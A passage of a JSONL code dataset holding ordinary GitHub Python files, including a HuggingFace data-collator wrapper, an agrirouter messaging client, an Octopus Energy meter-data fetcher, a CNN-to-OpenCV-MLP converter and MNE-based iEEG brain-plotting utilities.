self.tokenizer.padding_side\n self.max_length = \"input_ids\"\n self.pad_to_multiple_of = 
+{"seq_id":"30497101445","text":"from typing import Dict, Optional, Any\n\nfrom ..data_collator import DataCollator\nfrom ..dynamic_padding import DynamicPaddingDataCollator\n\n\ndef generalize_labels_key(batch, label_keys=(\"label\", \"label_ids\")):\n for key in label_keys:\n if key in batch:\n batch[\"labels\"] = batch.pop(key, None)\n\n return batch\n\nclass DefaultDataCollator(DataCollator):\n def collate(self, batch):\n return generalize_labels_key(batch)\n \nclass HuggingFaceDataCollatorWrapper:\n def __init__(\n self, \n tokenizer, \n additional_mapping: Optional[Dict[str, Any]] = None, \n pad_to_multiple_of=None,\n ignore_missing_keys=False,\n **args,\n ):\n self.tokenizer = tokenizer\n self.additional_mapping = additional_mapping\n\n if self.additional_mapping is None:\n self.additional_mapping = {}\n\n # dict.update mutates in place and returns None, so build the defaults\n # first and merge the overrides in a separate statement.\n self.mapping = {\n \"input_ids\": self.tokenizer.pad_token_id,\n \"attention_mask\": 0,\n \"token_type_ids\": self.tokenizer.pad_token_type_id,\n \"offset_mapping\": (0, 0),\n }\n self.mapping.update(self.additional_mapping)\n\n self.padding_side = self.tokenizer.padding_side\n self.max_length = \"input_ids\"\n self.pad_to_multiple_of = pad_to_multiple_of\n self.ignore_missing_keys = ignore_missing_keys\n\n self.dynamic_padding = DynamicPaddingDataCollator(\n mapping=self.mapping,\n max_length=self.max_length,\n padding_side=self.padding_side,\n pad_to_multiple_of=self.pad_to_multiple_of,\n ignore_missing_keys=self.ignore_missing_keys,\n )\n\n def default_collate(self, batch):\n batch = self.dynamic_padding(batch)\n batch = generalize_labels_key(batch)\n\n return batch","repo_name":"vad13irt/data-collators","sub_path":"src/data_collators/wrappers/huggingface.py","file_name":"huggingface.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"}
+{"seq_id":"34889040168","text":"import json\nfrom abc import ABC, abstractmethod\n\nfrom agrirouter.messaging.clients.http import HttpClient\nfrom agrirouter.messaging.clients.mqtt import MqttClient\nfrom agrirouter.messaging.messages import Message\nfrom agrirouter.messaging.request import MessageRequest\nfrom agrirouter.messaging.result import MessagingResult\nfrom agrirouter.onboarding.exceptions import BadMessagingResult\nfrom agrirouter.onboarding.response import SoftwareOnboardingResponse\n\n\nclass AbstractMessagingClient(ABC):\n\n @staticmethod\n def create_message_request(parameters) -> MessageRequest:\n messages = []\n for encoded_message in parameters.get_encoded_messages():\n message = Message(encoded_message)\n messages.append(message.json_serialize())\n message_request = MessageRequest(\n parameters.get_onboarding_response().get_sensor_alternate_id(),\n parameters.get_onboarding_response().get_capability_alternate_id(),\n messages\n )\n return message_request\n\n @abstractmethod\n def send(self, parameters):\n ...\n\n\nclass HttpMessagingService(AbstractMessagingClient):\n\n def __init__(self):\n self.client = HttpClient()\n\n def send(self, parameters) -> MessagingResult:\n request = self.create_message_request(parameters)\n response = self.client.send_measure(parameters.get_onboarding_response(), request)\n if response.status != 200:\n raise BadMessagingResult(f\"Messaging Request failed with status code {response.status}\")\n result = MessagingResult([parameters.get_application_message_id()])\n return result\n\n\nclass MqttMessagingService(AbstractMessagingClient):\n\n def __init__(self,\n onboarding_response: SoftwareOnboardingResponse,\n on_message_callback: callable = None,\n client_async: bool = True\n ):\n\n self.onboarding_response = onboarding_response\n self.client = MqttClient(\n onboard_response=onboarding_response,\n client_id=onboarding_response.get_connection_criteria().get_client_id(),\n on_message_callback=on_message_callback,\n )\n if client_async:\n self.client.connect_async(\n self.onboarding_response.get_connection_criteria().get_host(),\n self.onboarding_response.get_connection_criteria().get_port()\n )\n else:\n self.client.connect(\n self.onboarding_response.get_connection_criteria().get_host(),\n self.onboarding_response.get_connection_criteria().get_port()\n )\n\n def send(self, parameters, qos: int = 0) -> MessagingResult:\n message_request = self.create_message_request(parameters)\n mqtt_payload = message_request.json_serialize()\n self.client.publish(\n topic=self.onboarding_response.get_connection_criteria().get_measures(),\n payload=json.dumps(mqtt_payload),\n qos=qos\n )\n result = MessagingResult([parameters.get_application_message_id()])\n return 
result\n","repo_name":"DKE-Data/agrirouter-sdk-python","sub_path":"agrirouter/messaging/services/commons.py","file_name":"commons.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"42534609274","text":"from datetime import datetime, timedelta\nfrom urllib import parse\n\nfrom dateutil import parser\nfrom requests import get\n\nfrom RPC.helper import Configurable, WithInfluxDB, WithLogging\n\n\nclass Octopussy(WithInfluxDB, WithLogging, Configurable):\n dt_from = datetime.now() - timedelta(days=30)\n dt_to = datetime.now()\n app_config = {\n \"cron_octopus_period\": int,\n \"cron_octopus_apinum\": 1000,\n \"octopus_apikey\": str,\n \"octopus_elecsn\": str,\n \"octopus_gassn\": str,\n \"octopus_gasfac\": float(0),\n \"octopus_mpan\": str,\n \"octopus_mprn\": str,\n }\n\n uris = {\n \"electricity\": [\n \"https://api.octopus.energy/v1/electricity-meter-points/%s/meters/%s/consumption/\",\n \"octopus_mpan\",\n \"octopus_elecsn\",\n ],\n \"gas\": [\n \"https://api.octopus.energy/v1/gas-meter-points/%s/meters/%s/consumption/\",\n \"octopus_mprn\",\n \"octopus_gassn\",\n ],\n }\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, ctx=\"vnd.Octopussy\", dbvar=\"octopus_db\", **kwargs)\n\n def load_series(self, uri, dt_from=None, dt_to=None, page=None):\n \"\"\"\n Fetch all datapoints from Octopus, using recursion to handle pagination\n \"\"\"\n params = {\n \"period_from\": dt_from if dt_from else self.dt_from,\n \"period_to\": dt_to if dt_to else self.dt_to,\n \"page_size\": self.app_config.get(\"cron_octopus_apinum\"),\n }\n if page is not None:\n params[\"page\"] = page\n resp = get(uri, params=params, auth=(self.app_config.get(\"octopus_apikey\"), \"\"))\n resp.raise_for_status()\n res = resp.json()\n ret = res.get(\"results\", [])\n self.log.info(\n f\"Got {len(ret)} result(s) for range {dt_from} to {dt_to} (page {page})\",\n )\n if res[\"next\"]:\n p_next = parse.urlparse(res[\"next\"]).query\n ret += self.load_series(\n uri, dt_from, dt_to, page=parse.parse_qs(p_next)[\"page\"][0]\n )\n return ret\n\n def load_dt(self, series):\n \"\"\"\n Load the most recent datapoint for the given series from InfluxDB.\n If the most recent datapoint is not available or the series is formed differently,\n the series will be completely discarded and the default from date will be used.\n \"\"\"\n dt_from = self.dt_from\n dt_to = self.dt_to\n resp = self.db.query(\n f\"SELECT time, raw_consumption FROM {series} ORDER BY time DESC LIMIT 1\"\n )\n if (\n not self.app_config.get(\"db_influx_reset_db_contents\", False)\n and \"series\" in resp.raw\n and \"values\" in resp.raw[\"series\"][0]\n and len(resp.raw[\"series\"][0][\"values\"]) > 0\n ):\n dt_from = resp.raw[\"series\"][0][\"values\"][0][0]\n self.log.info(f\"Newest data for {series} from {dt_from}.\")\n else:\n if self.app_config.get(\"db_influx_reset_db_contents\", False):\n self.log.warning(\n f\"Resetting data for {series}, as the reset flag was set\",\n )\n else:\n self.log.warning(\n f\"Unable to get last entry timestamp for {series} - resetting.\",\n )\n self.db.query(f\"DROP SERIES FROM {series}\")\n return dt_from, dt_to\n\n def put_metrics(self, series, metrics):\n def _fields(measurement, factor):\n ret = {\n \"raw_consumption\": measurement[\"consumption\"],\n }\n if factor not in (None, float(0)) and series == \"gas\":\n ret[\"factor\"] = factor\n return ret\n\n def _tags(measurement):\n dt_now = 
parser.isoparse(measurement[\"interval_end\"])\n return {\n \"time_of_day\": dt_now.strftime(\"%H:%M\"),\n \"date\": dt_now.strftime(\"%d/%m/%Y\"),\n }\n\n measurements = [\n {\n \"measurement\": series,\n \"tags\": _tags(measurement),\n \"time\": measurement[\"interval_end\"],\n \"fields\": _fields(measurement, self.app_config.get(\"octopus_gasfac\")),\n }\n for measurement in metrics\n ]\n self.db.write_points(measurements)\n\n def process(self, series):\n self.put_metrics(\n series,\n self.load_series(\n self.uris[series][0]\n % (\n self.app_config.get(self.uris[series][1]),\n self.app_config.get(self.uris[series][2]),\n ),\n *self.load_dt(series),\n ),\n )\n\n\np_cls = Octopussy\n","repo_name":"Maffsie/rpc-app","sub_path":"RPC/provider/octopus.py","file_name":"octopus.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16370165637","text":"from tasks.google_search import GoogleSearch\n\ndef test_search_5():\n\n _word_search = \"github\"\n test = GoogleSearch()\n results = test.search()\n\n for result in results:\n assert _word_search in result.lower()\n\ntest_search_5()\n","repo_name":"MarcoRiosG/pruebasSelenium","sub_path":"tests/test_res_google.py","file_name":"test_res_google.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74125254226","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport sys\n\nimport numpy as np\nimport xml.etree.ElementTree as et\nfrom tensorflow.python import pywrap_tensorflow\n\nsize_map = dict(conv2d=(80, 80, 3), conv2d_1=(40, 40, 32), conv2d_2=(20, 20, 64))\n\n\n# kernel \\in R^{width height channels filters}\ndef conv2dense(kernel, bias, input_size, stride):\n input_size_flat = input_size[0] * input_size[1] * input_size[2]\n output_size_flat = (input_size[0] // stride) * (input_size[1] // stride) * kernel.shape[3]\n weights = np.zeros((input_size_flat, output_size_flat))\n\n for f in range(0, kernel.shape[2]):\n for chi in range(0, input_size[0], stride):\n for upsilon in range(0, input_size[1], stride):\n kx = (kernel.shape[0] - 1) // 2\n ky = (kernel.shape[1] - 1) // 2\n w = np.zeros((input_size[0] // stride, input_size[1] // stride, kernel.shape[3]))\n for c in range(0, kernel.shape[2]):\n for x in range(-kx, kx):\n for y in range(-ky, ky):\n ix = chi // stride + x\n iy = upsilon // stride + y\n if 0 <= ix < w.shape[0] and 0 <= iy < w.shape[1]:\n w[ix][iy][c] = kernel[x + kx][y + ky][c][f]\n w_flat = np.reshape(w, -1)\n index = f * input_size[0] * input_size[1] + chi * input_size[1] + upsilon\n weights[index] = w_flat\n\n bias_vect = np.zeros(output_size_flat)\n per_bias_count = (input_size[0] // stride) * (input_size[1] // stride)\n for i in range(0, bias.shape[0]):\n for c in range(0, per_bias_count):\n bias_vect[c + i * per_bias_count] = bias[i]\n\n return weights, bias_vect\n\n\ndef get_order(layers_map):\n print(\"Retrieving order...\")\n ret = list()\n for key in sorted(layers_map):\n ret.append(layers_map[key])\n print(\"...finished!\")\n return ret\n\n\ndef map_layers(matrixes):\n print(\"Mapping layers...\")\n num_of_layers = int(len(matrixes) / 2)\n print(\"Assuming that the net consists of %d layers\" % num_of_layers)\n layer_names = set()\n for name, _ in matrixes.items():\n layer_name = name.split(\"/\", 1)[0]\n layer_names.add(layer_name)\n\n weights_cnn = 0\n 
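`conv2dense` above unrolls a convolution kernel into an equivalent dense weight matrix. The 1-D analog below (a hypothetical helper, plain numpy) verifies the core idea: a valid-mode correlation equals a Toeplitz-style matrix product.

```python
import numpy as np

def conv1d_as_matrix(kernel, n):
    # Build the dense matrix whose product with a length-n input vector
    # equals the "valid" 1-D correlation with `kernel`.
    k = len(kernel)
    m = n - k + 1
    W = np.zeros((m, n))
    for i in range(m):
        W[i, i:i + k] = kernel
    return W

x = np.arange(6.0)
kernel = np.array([1.0, -2.0, 0.5])
direct = np.correlate(x, kernel, mode="valid")
dense = conv1d_as_matrix(kernel, len(x)) @ x
assert np.allclose(direct, dense)  # conv == matrix multiply
```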
weights_mlp = 0\n\n layers_map = dict()\n for layer_name in layer_names:\n kernel = matrixes[layer_name + \"/kernel\"]\n bias = matrixes[layer_name + \"/bias\"]\n\n if \"conv\" in layer_name:\n weights_for_kernel = 1\n weights_for_bias = 1\n for s in kernel.shape:\n weights_for_kernel *= s\n for s in bias.shape:\n weights_for_bias *= s\n weights_cnn += weights_for_bias + weights_for_kernel\n\n kernel, bias = conv2dense(kernel, bias, size_map[layer_name], 3)\n\n weights_for_kernel = 1\n weights_for_bias = 1\n for s in kernel.shape:\n weights_for_kernel *= s\n for s in bias.shape:\n weights_for_bias *= s\n weights_mlp += weights_for_bias + weights_for_kernel\n\n layers_map[layer_name] = (kernel, bias)\n\n print(\"Weights CNN: %d\\tWeights MLP: %d\" % (weights_cnn, weights_mlp))\n print(\"...finished!\")\n return get_order(layers_map)\n\n\ndef save_to_opencv(layers):\n print(\"Saving to opencv...\")\n layer_sizes_text = \"\"\n input_scale_text = \"\"\n output_scale_text = \"\"\n\n output_size = layers[len(layers) - 1][0].shape[1]\n input_size = layers[0][0].shape[0]\n\n for c in range(0, len(layers)):\n weight, bias = layers[c]\n layer_sizes_text += str(weight.shape[0]) + \" \"\n\n layer_sizes_text += str(output_size)\n\n for _ in range(0, input_size):\n input_scale_text += \"1. 0. \"\n\n for _ in range(0, output_size):\n output_scale_text += \"1. 0. \"\n\n print(\"...building xml...\")\n root = et.Element(\"opencv_storage\")\n mlp = et.SubElement(root, \"opencv_ml_ann_mlp\")\n format = et.SubElement(mlp, \"format\")\n layer_sizes = et.SubElement(mlp, \"layer_sizes\")\n activation_function = et.SubElement(mlp, \"activation_function\")\n f_param1 = et.SubElement(mlp, \"f_param1\")\n f_param2 = et.SubElement(mlp, \"f_param2\")\n min_val = et.SubElement(mlp, \"min_val\")\n max_val = et.SubElement(mlp, \"max_val\")\n min_val1 = et.SubElement(mlp, \"min_val1\")\n max_val1 = et.SubElement(mlp, \"max_val1\")\n training_params = et.SubElement(mlp, \"training_params\")\n train_method = et.SubElement(training_params, \"train_method\")\n dw_scale = et.SubElement(training_params, \"dw_scale\")\n moment_scale = et.SubElement(training_params, \"moment_scale\")\n term_criteria = et.SubElement(training_params, \"term_criteria\")\n epsilon = et.SubElement(term_criteria, \"epsilon\")\n iterations = et.SubElement(term_criteria, \"iterations\")\n input_scale = et.SubElement(mlp, \"input_scale\")\n output_scale = et.SubElement(mlp, \"output_scale\")\n inv_output_scale = et.SubElement(mlp, \"inv_output_scale\")\n weights = et.SubElement(mlp, \"weights\")\n layer_weights = list()\n for _ in layers:\n layer_weights.append(et.SubElement(weights, \"_\"))\n\n format.text = \"3\" # OpenCv Version 2 or 3, 4 is treated as 3\n layer_sizes.text = layer_sizes_text\n activation_function.text = \"SIGMOID_SYM\" # Sigmoid, which is actually tanh\n f_param1.text = \"1\" # Use a normalied opencv-sigmoid which is tanh(x/2)\n f_param2.text = \"1\"\n min_val.text = \"0.\"\n max_val.text = \"0.\"\n min_val1.text = \"0.\"\n max_val1.text = \"0.\"\n train_method.text = \"BACKPROP\"\n dw_scale.text = \"1.0e-03\"\n moment_scale.text = \"0.\"\n epsilon.text = \"1.0e-02\"\n iterations.text = \"1000\"\n input_scale.text = input_scale_text\n output_scale.text = output_scale_text\n inv_output_scale.text = output_scale_text\n\n for c in range(0, len(layers)):\n layer_weights[c].text = \"__SPLIT__\"\n\n print(\"...splitting...\")\n xml_str = et.tostring(root, encoding='utf8', method='xml')\n parts = str(xml_str).split(\"__SPLIT__\")\n for c in 
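The `__SPLIT__` sentinel trick above serializes the XML skeleton once and streams the large weight arrays into the gaps. One pitfall worth noting: `et.tostring(root, encoding='utf8')` returns *bytes*, so `str(xml_str)` produces a `b'...'`-prefixed string that ends up in `part_00.xml`; `encoding="unicode"` returns a plain `str` and avoids that. A small sketch:

```python
import xml.etree.ElementTree as et

root = et.Element("opencv_storage")
mlp = et.SubElement(root, "opencv_ml_ann_mlp")
et.SubElement(mlp, "layer_sizes").text = "4 8 2"
weights = et.SubElement(mlp, "weights")
et.SubElement(weights, "_").text = "__SPLIT__"  # placeholder for a big matrix

xml_str = et.tostring(root, encoding="unicode")  # str, not bytes
head, tail = xml_str.split("__SPLIT__")
print(head + "...weights streamed here..." + tail)
```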
range(0, len(parts)):\n        file = open(\"part_%02d.xml\" % (c * 2), \"w\")\n        file.write(parts[c])\n        file.close()\n\n    print(\"...writing matrices...\")\n    for c in range(0, len(layers)):\n        weight, bias = layers[c]\n        homogeneous = np.concatenate((weight, [bias]), axis=0)\n        flattened = homogeneous.flatten('A')\n\n        print(\"w\")\n        file = open(\"part_%02d.xml\" % (c * 2 + 1), \"w\")\n        for w in flattened:\n            # weights are floats; the original \"%d\" would truncate them to integers\n            file.write(\"%.10g \" % w)\n        file.close()\n\n    print(\"...finished!\")\n\n\ndef main():\n    if len(sys.argv) != 2:\n        print(\"usage: main.py model.ckpt\")\n        exit(1)\n\n    checkpoint_file = sys.argv[1]\n\n    reader = pywrap_tensorflow.NewCheckpointReader(checkpoint_file)\n\n    var_to_shape_map = reader.get_variable_to_shape_map()\n    weights = dict()\n    for key in sorted(var_to_shape_map):\n        weights[key] = reader.get_tensor(key)\n    layers = map_layers(weights)\n    save_to_opencv(layers)\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"aul12/Cnn2Mlp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7474155404","text":"from os import walk\nimport re\nimport os\nimport shutil\nimport math\n\nedges_path = \"E:/Uni_Projects/3DMeshes/2020_ProjectMeshPreparation/small_meshes/proc\"\n_, _, filenames = next(walk(edges_path))\n\nfor name in filenames:\n    if not '.edges' in name:\n        continue\n    \n    wo_ext = re.sub(\"\\.edges\", \"\", name)\n    print(wo_ext)\n    \n    file = open(name, 'r')\n    lines = file.readlines()\n    print(len(lines))\n    file.close()\n    \n    eseg_file = wo_ext + \".eseg\"\n    print(eseg_file)\n    \n    mid = math.floor(len(lines)/2)\n    \n    new_file = open(eseg_file, 'w+')\n    for i in range(0, mid, 1):\n        new_file.write(\"0\\n\")\n    for i in range(mid, len(lines), 1):\n        new_file.write(\"1\\n\")\n    new_file.close()\n","repo_name":"vijusudhi/Preprocessing3DMeshes","sub_path":"batch_2/edges/tweak_edges.py","file_name":"tweak_edges.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70873920145","text":"import csv\nimport os.path as op\nfrom collections import OrderedDict\nfrom collections.abc import Iterable\nfrom functools import singledispatch\nimport mne\nimport nibabel as nib\nimport numpy as np\nfrom mne.viz import Brain\n\nfrom ieeg import PathLike, Signal\nfrom ieeg.io import get_elec_volume_labels\nfrom ieeg.viz import _qt_backend\n\n_qt_backend()\n\nimport matplotlib  # noqa: E402\nimport matplotlib.patheffects as path_effects  # noqa: E402\nimport matplotlib.pyplot as plt  # noqa: E402\n\n\ndef plot_overlay(image: nib.Nifti1Image, compare: nib.Nifti1Image,\n                 title: str, thresh: float = None):\n    \"\"\"Plots an overlay of two images\n\n    Parameters\n    ----------\n    image : nib.Nifti1Image\n        The image to plot\n    compare : nib.Nifti1Image\n        The image to overlay\n    title : str\n        The title of the plot\n    thresh : float, optional\n        The threshold to apply to the overlay, by default None\n    \"\"\"\n    image = nib.orientations.apply_orientation(\n        np.asarray(image.dataobj), nib.orientations.axcodes2ornt(\n            nib.orientations.aff2axcodes(image.affine))).astype(np.float32)\n    compare = nib.orientations.apply_orientation(\n        np.asarray(compare.dataobj), nib.orientations.axcodes2ornt(\n            nib.orientations.aff2axcodes(compare.affine))).astype(np.float32)\n    if thresh is not None:\n        compare[compare < np.quantile(compare, thresh)] = np.nan\n    fig, axes = plt.subplots(1, 3, figsize=(12, 4))\n    fig.suptitle(title)\n    
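The loop that follows pulls the middle slice of the volume along each axis with `np.take`. A stand-alone illustration of that step, with a random array in place of an MRI volume:

```python
import numpy as np

vol = np.random.rand(4, 5, 6)
for axis in range(vol.ndim):
    mid = vol.shape[axis] // 2
    # np.take with a singleton index list keeps the axis, hence the squeeze
    sl = np.take(vol, [mid], axis=axis).squeeze()
    print(axis, sl.shape)  # (5, 6), (4, 6), (4, 5)
```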
for i, ax in enumerate(axes):\n ax.imshow(np.take(image, [image.shape[i] // 2], axis=i).squeeze().T,\n cmap='gray')\n ax.imshow(np.take(compare, [compare.shape[i] // 2],\n axis=i).squeeze().T, cmap='gist_heat', alpha=0.5)\n ax.invert_yaxis()\n ax.axis('off')\n fig.tight_layout()\n\n\ndef allign_CT(t1_path: PathLike, ct_path: PathLike, reg_affine=None\n ) -> nib.spatialimages.SpatialImage:\n \"\"\"Alligns a CT scan to a T1 scan\n\n Parameters\n ----------\n t1_path : PathLike\n The path to the T1 scan\n ct_path : PathLike\n The path to the CT scan\n reg_affine : np.ndarray, optional\n The affine to use for registration, by default None\n\n Returns\n -------\n nib.spatialimages.SpatialImage\n The alligned CT scan\n \"\"\"\n T1 = nib.load(t1_path)\n CT_orig = nib.load(ct_path)\n sdr_morph = None\n if reg_affine is None:\n reg_affine, sdr_morph = mne.transforms.compute_volume_registration(\n CT_orig, T1, pipeline='all')\n CT_aligned = mne.transforms.apply_volume_registration(CT_orig, T1,\n reg_affine,\n sdr_morph)\n return CT_aligned\n\n\ndef show_brain(my_raw: Signal, trans: mne.transforms.Transform,\n sub_id: PathLike, subjects_dir: PathLike = None,\n overwrite: bool = False):\n \"\"\"Shows the brain with the electrodes projected onto it\n\n Parameters\n ----------\n my_raw : Signal\n The data to plot\n trans : mne.transforms.Transform\n The transformation to use\n sub_id : PathLike\n The subject id\n subjects_dir : PathLike, optional\n The subjects directory, by default LAB_root / 'ECoG_Recon_Full'\n overwrite : bool, optional\n Whether to overwrite the watershed bem, by default False\n \"\"\"\n subjects_dir = get_sub_dir(subjects_dir)\n try:\n mne.bem.make_watershed_bem(sub_id, subjects_dir, overwrite=overwrite)\n except RuntimeError:\n pass\n my_raw.info = mne.preprocessing.ieeg.project_sensors_onto_brain(\n my_raw.info, trans, sub_id, subjects_dir=subjects_dir)\n brain_kwargs = dict(cortex='low_contrast', alpha=0.2, background='white')\n brain = mne.viz.Brain(sub_id, surf='white', subjects_dir=subjects_dir,\n title='Projection', **brain_kwargs)\n brain.add_sensors(my_raw.info, trans=trans)\n view_kwargs = dict(azimuth=60, elevation=100, distance=350,\n focalpoint=(0, 0, -15))\n brain.show_view(**view_kwargs)\n\n\ndef imshow_mri(data, img: nib.spatialimages.SpatialImage,\n vox: tuple[int, int, int], xyz: dict, suptitle: str = \"\"):\n \"\"\"Show an MRI slice with a voxel annotated.\n\n Parameters\n ----------\n data : np.ndarray\n The data to plot\n img : nib.spatialimages.SpatialImage\n The image to plot\n vox : tuple[int, int, int]\n The voxel to annotate\n xyz : dict\n The xyz coordinates of the voxel\n suptitle : str, optional\n The title of the plot, by default \"\"\n\n Returns\n -------\n fig, ax : matplotlib.pyplot.Figure, matplotlib.pyplot.Axes\n The figure and axes of the plot\n \"\"\"\n i, j, k = vox\n fig, ax = plt.subplots(1, figsize=(6, 6))\n codes = nib.orientations.aff2axcodes(img.affine)\n # Figure out the title based on the code of this axis\n ori_slice = dict(\n P=\"Coronal\", A=\"Coronal\", I=\"Axial\", S=\"Axial\", L=\"Sagittal\",\n R=\"Sagittal\"\n )\n ori_names = dict(\n P=\"posterior\", A=\"anterior\", I=\"inferior\", S=\"superior\", L=\"left\",\n R=\"right\"\n )\n title = ori_slice[codes[0]]\n ax.imshow(data[i], vmin=10, vmax=120, cmap=\"gray\", origin=\"lower\")\n ax.axvline(k, color=\"y\")\n ax.axhline(j, color=\"y\")\n for kind, coords in xyz.items():\n annotation = \"{}: {}, {}, {} mm\".format(kind,\n *np.round(coords).astype(int))\n text = ax.text(k, j, 
annotation, va=\"baseline\", ha=\"right\",\n color=(1, 1, 0.7))\n text.set_path_effects(\n [\n path_effects.Stroke(linewidth=2, foreground=\"black\"),\n path_effects.Normal(),\n ]\n )\n # reorient view so that RAS is always rightward and upward\n x_order = -1 if codes[2] in \"LIP\" else 1\n y_order = -1 if codes[1] in \"LIP\" else 1\n ax.set(\n xlim=[0, data.shape[2] - 1][::x_order],\n ylim=[0, data.shape[1] - 1][::y_order],\n xlabel=f\"k ({ori_names[codes[2]]}+)\",\n ylabel=f\"j ({ori_names[codes[1]]}+)\",\n title=f\"{title} view: i={i} ({ori_names[codes[0]]}+)\",\n )\n fig.suptitle(suptitle)\n fig.subplots_adjust(0.1, 0.1, 0.95, 0.85)\n return fig\n\n\ndef get_sub_dir(subj_dir: PathLike = None):\n \"\"\"Gets the subjects directory\n\n Parameters\n ----------\n subj_dir : PathLike, optional\n The subjects directory, by default LAB_root / 'ECoG_Recon_Full'\n\n Returns\n -------\n PathLike\n The subjects directory\n \"\"\"\n if subj_dir is None:\n from os import path\n HOME = path.expanduser(\"~\")\n subj_dir = op.join(HOME, \"Box\", \"ECoG_Recon\")\n return subj_dir\n\n\ndef plot_gamma(evoked: mne.Evoked, subjects_dir: PathLike = None, **kwargs):\n \"\"\"Plots the gamma power over time\n\n Parameters\n ----------\n evoked : mne.Evoked\n The data to plot\n subjects_dir : PathLike, optional\n The subjects directory, by default LAB_root / 'ECoG_Recon_Full'\n **kwargs\n Additional arguments to pass to plot_on_average\n \"\"\"\n data = evoked.copy().filter(30, 150).apply_hilbert(envelope=True)._data\n fig = plot_on_average(evoked.info, subjects_dir=subjects_dir, **kwargs)\n mne.viz.set_3d_view(fig, azimuth=0, elevation=70)\n\n xy, im = mne.viz.snapshot_brain_montage(fig, evoked.info)\n # convert from a dictionary to array to plot\n xy_pts = np.vstack([xy[ch] for ch in evoked.info['ch_names']])\n\n # get a colormap to color nearby points similar colors\n cmap = matplotlib.cm.get_cmap('viridis')\n\n # create the figure of the brain with the electrode positions\n fig, ax = plt.subplots(figsize=(5, 5))\n ax.set_title('Gamma power over time', size='large')\n ax.imshow(im)\n ax.set_axis_off()\n\n # normalize gamma power for plotting\n gamma_power = -100 * data / data.max()\n # add the time course overlaid on the positions\n x_line = np.linspace(-0.025 * im.shape[0], 0.025 * im.shape[0],\n data.shape[1])\n for i, pos in enumerate(xy_pts):\n x, y = pos\n color = cmap(i / xy_pts.shape[0])\n ax.plot(x_line + x, gamma_power[i] + y, linewidth=0.5, color=color)\n\n\ndef plot_on_average(sigs: Signal | str | list[Signal | str, ...],\n subj_dir: PathLike = None, rm_wm: bool = True,\n picks: list[int | str, ...] 
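`imshow_mri` above outlines its light-colored annotation with a black stroke so the text stays readable over any slice. The minimal matplotlib pattern, isolated:

```python
import matplotlib
matplotlib.use("Agg")  # render off-screen; no GUI backend needed for this sketch
import matplotlib.pyplot as plt
import matplotlib.patheffects as path_effects

fig, ax = plt.subplots()
text = ax.text(0.5, 0.5, "annotation", color=(1, 1, 0.7), ha="right")
# a dark stroke behind the glyphs keeps light text readable on any background
text.set_path_effects([path_effects.Stroke(linewidth=2, foreground="black"),
                       path_effects.Normal()])
fig.savefig("annotated.png")
```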
= None, surface: str = 'pial',\n hemi: str = 'split', color: matplotlib.colors = (1, 1, 1),\n size: float = 0.35, fig: Brain = None,\n background: str = 'white') -> Brain:\n \"\"\"Plots the signal on the average brain\n\n Takes a signal instance or list of signal instances and plots them on the\n fsaverage brain.\n\n Parameters\n ----------\n sigs : Union[Signal, list[Signal]]\n The signal(s) to plot\n subj_dir : PathLike, optional\n The subjects directory, by default LAB_root / 'ECoG_Recon'\n rm_wm : bool, optional\n Whether to remove white matter electrodes, by default True\n picks : list[int | str], optional\n The channels to plot, by default None\n surface : str, optional\n The surface to plot on, by default 'pial'\n hemi : str, optional\n The hemisphere to plot, by default 'split'\n color : matplotlib.colors, optional\n The color to plot, by default (1, 1, 1)\n size : float, optional\n The size of the markers, by default 0.35\n fig : Brain, optional\n The figure to plot on, by default None\n background: str, optional\n Background color\n\n Returns\n -------\n Brain\n The figure brain object\n \"\"\"\n\n subj_dir = get_sub_dir(subj_dir)\n if fig is None:\n fig = Brain('fsaverage', subjects_dir=subj_dir, cortex='low_contrast',\n alpha=0.6, background=background, surf=surface, hemi=hemi)\n\n if isinstance(sigs, (Signal, mne.Info)):\n sigs = [sigs]\n if isinstance(sigs, Iterable):\n sigs = {get_sub(v): v for v in sigs}\n\n for subj, inst in sigs.items():\n\n if isinstance(inst, mne.Info):\n new = inst.copy()\n elif isinstance(inst, Signal):\n new = inst.info.copy()\n elif isinstance(inst, str):\n new = subject_to_info(subj)\n new['subject_info'] = dict(his_id=f\"sub-{inst}\")\n else:\n raise TypeError(type(inst))\n\n to_fsaverage = mne.read_talxfm(subj, subj_dir)\n to_fsaverage = mne.transforms.Transform(fro='head', to='mri',\n trans=to_fsaverage['trans'])\n\n these_picks = range(len(new.ch_names))\n if isinstance(picks, Iterable):\n if len(picks) == 0:\n continue\n elif isinstance(picks[0], int):\n these_picks = [new.ch_names[pick] for pick in these_picks if\n pick in picks]\n picks = [p - len(new.ch_names) for p in\n picks[len(these_picks):]]\n elif isinstance(picks[0], str):\n these_picks = [s[6:] for s in picks if s[:5] in\n new['subject_info']['his_id']]\n elif picks is not None:\n raise TypeError(picks)\n\n if len(these_picks) == 0:\n continue\n\n if rm_wm:\n these_picks = pick_no_wm(these_picks, gen_labels(\n new, subj, subj_dir, new.ch_names))\n\n if len(these_picks) == 0:\n continue\n\n # plot the data\n plot_subj(new, subj_dir, these_picks, False, fig=fig,\n trans=to_fsaverage, color=color, size=size,\n labels_every=None, hemi=hemi, background=background)\n\n return fig\n\n\ndef pick_no_wm(picks: list[str], labels: OrderedDict[str: str]):\n \"\"\"Picks the channels that are not in the white matter\n\n Parameters\n ----------\n picks : list[str | int]\n The channels to pick from\n labels : dict[str | int, list[str]]\n The labels for each channel\n\n Returns\n -------\n list[str | int]\n The channels that are not in the white matter\n \"\"\"\n bad_words = ('Unknown', 'unknown', 'hypointensities', 'White-Matter')\n\n # remove corresponding picks with either 'White-Matter' in the left most\n # entry or empty 